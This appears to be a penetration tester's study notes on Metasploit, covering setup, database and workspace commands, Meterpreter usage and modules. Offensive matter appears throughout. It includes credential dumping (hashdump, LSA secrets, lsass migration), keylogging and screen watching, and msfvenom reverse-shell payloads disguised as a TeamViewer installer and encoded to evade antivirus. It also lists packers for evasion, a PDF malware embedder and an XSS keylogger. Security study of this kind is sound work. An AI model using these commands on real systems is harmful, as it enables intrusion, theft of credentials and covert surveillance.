metasploit
Developed in ruby by rapid7. "Free" edition preinstalled in Kali at /usr/share/metasploit-framework
Existent modules:
ls /usr/share/metasploit-framework/modules
auxiliary encoders evasion exploits nops payloads post
# Syntax: <No.> <type>/<os>/<service>/<name>
# Example
794 exploit/windows/ftp/scriptftp_list
Existent plugins:
ls /usr/share/metasploit-framework/plugins/
aggregator.rb ips_filter.rb openvas.rb sounds.rb
alias.rb komand.rb pcap_log.rb sqlmap.rb
auto_add_route.rb lab.rb request.rb thread.rb
beholder.rb libnotify.rb rssfeed.rb token_adduser.rb
db_credcollect.rb msfd.rb sample.rb token_hunter.rb
db_tracker.rb msgrpc.rb session_notifier.rb wiki.rb
event_tester.rb nessus.rb session_tagger.rb wmap.rb
ffautoregen.rb nexpose.rb socket_logger.rb
Existent scripts (meterpreter among them):
Command line utilities:
ls /usr/share/metasploit-framework/tools/
context docs hardware modules payloads
dev exploit memdump password recon
Run metasploit
# start the postgresql service
service postgresql start
# Initiate database
sudo msfdb init
# Launch metasploit from terminal. -q means without banner
msfconsole -q
Update metasploit
How to update metasploit database, since msfupdate is deprecated.
# Update the whole system
apt update && apt-upgrade -y
# Update libraries and dependencies
apt dist-upgrade
# Reinstall the app
apt install metasploit-framework
Basic commands
Databases
# Start PostgreSQL
sudo systemctl start postgresql
# Initiate a Database
sudo msfdb init
# Check status
sudo msfdb status
# Connect to the Initiated Database
sudo msfdb run
# Reinitiate the Database
msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q
db_status
# Connect to an existing data service
db_connect
# Disconnect from the current data service
db_disconnect
# Export a file containing the contents of the database
db_export
# Before closing the session, save a backup:
db_export -f xml backup.xml
# Import a scan result file (filetype will be auto-detected)
db_import
# For instance:
db_import Target.xml
# Or:
db_import Target.nmap
# After finishing the session, make sure to back up our data if anything happens with the PostgreSQL service.
db_export -f xml backup.xml
# Rebuilds the database-stored module cache (deprecated)
db_rebuild_cache
# Remove the saved data service entry
db_remove
# Save the current data service connection as the default to reconnect on startup
db_save
# Show the current data service status
db_status
Workspaces
#####
# workspaces
#####
# Switch between database
workspace
# List workspaces
workspace
# List workspaces verbosely
workspace -v
# Switch workspace
workspace [name]
# Add workspace(s)
workspace -a [name] ...
# Delete workspace(s)
workspace -d [name] ...
# Delete all workspaces
workspace -D
# Rename workspace
workspace -r
# Show this help information
workspace -h
Nmap
#####
# ## Using Nmap Inside MSFconsole
#####
# Executes nmap and records the output automatically
db_nmap
# List all hosts in the database
hosts
# List stored Credentials. The `creds` command allows you to visualize the credentials gathered during your interactions with the target host. We can also add credentials manually, match existing credentials with port specifications, add descriptions, etc.
creds
# List all loot in the database. The `loot` command works in conjunction with the command above to offer you an at-a-glance list of owned services and users. The loot, in this case, refers to hash dumps from different system types, namely hashes, passwd, shadow, and more:
loot
# List all notes in the database
notes
# List all services in the database.The `services` command functions the same way as the previous one. It contains a table with descriptions and information on services discovered during scans or interactions. In the same way as the command above, the entries here are highly customizable.
services
# List all vulnerabilities in the database
vulns
Cheat sheet: basic commands
To kill a session we don't use CTRL-C, because the port would be still in use. For that we have jobs
+++++++++
jobs
++++++++++
-K Terminate all running jobs.
-P Persist all running jobs on restart.
-S <opt> Row search filter.
-h Help banner.
-i <opt> Lists detailed information about a running job.
-k <opt> Terminate jobs by job ID and/or range.
-l List all running jobs.
-p <opt> Add persistence to job by job ID
-v Print more detailed info. Use with -i and -l
Plugins
To start using a plugin, we will need to ensure it is installed in the correct directory on our machine.
If the plugin is found here, we can fire it up inside msfconsole. Example:
To install new custom plugins not included in new updates of the distro, we can take the .rb file provided on the maker's page and place it in the folder at /usr/share/metasploit-framework/plugins
with the proper permissions. Many people write many different plugins for the Metasploit framework:
nMap (pre-installed) NexPose (pre-installed) Nessus (pre-installed) Mimikatz (pre-installed V.1) Stdapi (pre-installed) Railgun Priv Incognito (pre-installed) Darkoperator's
Afterward, launch msfconsole
and check the plugin's installation by running the load
command. After the plugin has been loaded, the help menu
at the msfconsole
is automatically extended by additional functions.
# MSF - Loading Additional Modules at Runtime
cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb
msfconsole -m /usr/share/metasploit-framework/modules/
# #### MSF - Loading Additional Modules
loadpath /usr/share/metasploit-framework/modules/
reload_all
Meterpreter
The Meterpreter payload is a specific type of multi-faceted payload that uses DLL injection
to ensure the connection to the victim host is stable, hard to detect by simple checks, and persistent across reboots or system changes. Meterpreter resides completely in the memory of the remote host and leaves no traces on the hard drive, making it very difficult to detect with conventional forensic techniques.
When having an active session on the victim machine, the best module to run a Meterpreter is s4u_persistence:
Meterpreter commands
# view all available commands
help
# Obtain a shell. Exit to exit the shell
shell
# View information about the system
sysinfo
# View the id that meterpreter assigns to the machine
machine_id
# Print the network configuration
ifconfig
# check routing information
route
# Download a file
download /path/to/fileofinterest.txt /path/to/ourmachine/destinationfile.txt
# Upload a file
upload /path/from/source.txt /path/to//destinationfile.txt
# Bypass the authentification. It takes you from normal user to admin
getsystem
# If the operation fails because of priv_elevated_getsystem error message, then use the bypassuac module: use exploit/windows/local/bypassuac
# View who you are
getuid
# View all running processes
ps
# Migrate to a different process with more privileges
steal_token <PID>
# View the process that we are
getpid
# Dumps the contents of the SAM database
hashdump
# Dumps ...
lsa_dump_sam
# Meterpreter LSA Secrets Dump
lsa_dump_secrets
# Enumerate the modules available at this meterpreter session
use -l
# load a specific module
use <name of module>
# View all processes run by the system. This allows us to choose one in order to migrate the process of our persistent connection in order to have one less suspicious.
ps -U SYSTEM
# Change to a process
migrate <pid>
migrate -N lsass.exe
# -N Look for the lsass.exe process and migrate the process into that. We can do this to run the command: hashdump (we’ll get hashes to use them with john the ripper or ophcrack). Also, we can choose a less suspicious process such as svhost.exe and migrate there.
# Get a windows shell
execute -f cmd.exe -i -H
# Display the host ARP cache
arp
# Display the current proxy configuration
get proxy
# Display interfaces
ifconfig
# Display the network connections
netstat
# Forward a local port to a remote service
portfwd
# Resolve a set of hostnames on the target
resolve
# Send Session to backgroud
bg
More commands
msf6> help
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idle time Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real-time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Encoders
Encoders
come into play with the role of changing the payload to run on different operating systems and architectures. These architectures include: x64
, x86
, sparc
, ppc
, mips
.
Shikata Ga Nai (SGN
) is one of the most utilized Encoding schemes today because it is so hard to detect that payloads encoded through its mechanism are not universally undetectable anymore.
Generating Payload - Without Encoding
# #### Generating Payload - Without Encoding
# For instance, crafting a DLL file with a webshell
#########
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port$ -a x86 -f dll > SECUR32.dll
# -p: for the chosen payload
# -a: architecture in the victim machine/application
# -f: format for the output file
# List enconders
show encoders
Generating Payload - With Encoding
# #### Generating Payload - With Encoding
# crafting a .exe file with Shikata Ga Nai encoder
#########
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe
# -e: chosen encoder
We can run multiple iterations of the same encoding scheme to escape EDS/IDR
# #### Generating Payload - With Encoding -
# Running multiple iterations
#########
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe -k
# -a: The architecture to use for --payload and --encoders (use --list archs to list)
# -x, --template <path>: Specify a custom executable file to use as a template
# -k, --keep: Preserve the --template behaviour and inject the payload as a new thread
As we can see, it is still not enough for AV evasion. There is a high number of products that still detect the payload. Alternatively, Metasploit offers a tool called msf-virustotal
that we can use with an API key to analyze our payloads. However, this requires free registration on VirusTotal.
MSF - VirusTotal
If we check against VirusTotal to get a detection baseline from the payload we generated:
Packers
Packers allow the executable compression
of payload along with the executable program, leading to the decompression code in one single file. Packing Services for Optimal Antivirus Evasion (list of popular packer software):
UPX packer The Enigma Protector MPRESS Alternate EXE Packer ExeStealth Morphine MEW Themida
Modules
multi/handler
Setting Up Multi/Handler
search local_exploit_suggester
Once you've gained foothold in a system, this module helps you find ways to exploit the target further (provileges escalation).
auxiliary/scanner/smb/smb_login
Use this to enumerate users and brute force passwords in a smb service.
auxiliary/http_javascript_keylogger
It creates the Javascript payload with a keylogger, which could be injected within the XSS vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.
post/windows/gather/hasdump
Once you have a meterpreter session as system user, this module dumps all passwords.
windows/gather/arp-scanner
To enumerate IPs in a network interface
windows/gather/credentials/windows_autologin
This module extracts the plain-text Windows user login password in Registry. It exploits a Windows feature that Windows (2000 to 2008 R2) allows a user or third-party Windows Utility tools to configure User AutoLogin via plain-text password insertion in (Alt)DefaultPassword field in the registry location - HKLM\Software\Microsoft\Windows NT\WinLogon. This is readable by all users.
post/windows/gather/win_privs
This module tells you the privileges you have on the exploited machine.
exploit/windows/local/bypassuac
If getsystem command fails (in the meterpreter) because of a priv_elevated_getsystem error message, then use this module to bypass that restriction. You will get a new meterpreter session with the UAC policy disabled. Now you can run getsystem.use
post/multi/manage/shell_to_meterpretersessions
It upgrades your shell to a meterpreter
post/multi/recon/local_exploit_suggester
local exploit suggester module:
auxiliary/server/socks_proxy
This module provides a SOCKS proxy server that uses the builtin Metasploit routing to relay connections.
exploit/windows/fileformat/adobe_pdf_embedded_exe
And also exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs To include malware into an adobe pdf
Integration of metasploit with veil
One nice thing about veil is that it provides a metasploit RC file, meaning that in order to launch the multihandler you just need to run:
IPMI Information discovery
See ipmi service on UDP/623. This module discovers host information through IPMI Channel Auth probes:
use auxiliary/scanner/ipmi/ipmi_version
show actions ...actions... msf
set ACTION < action-name > msf
show options
# and set needed options
run
PMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
This module identifies IPMI 2.0-compatible systems and attempts to retrieve the HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
use auxiliary/scanner/ipmi/ipmi_dumphashes
show actions
set ACTION < action-name >
show options
# set <options>
run
The http_javascript_keylogger
This modules runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to "test", the following URL will load this script into the calling site: http://server:port/test/anything.js
Last update: 2024-10-02 Created: February 2, 2023 19:36:50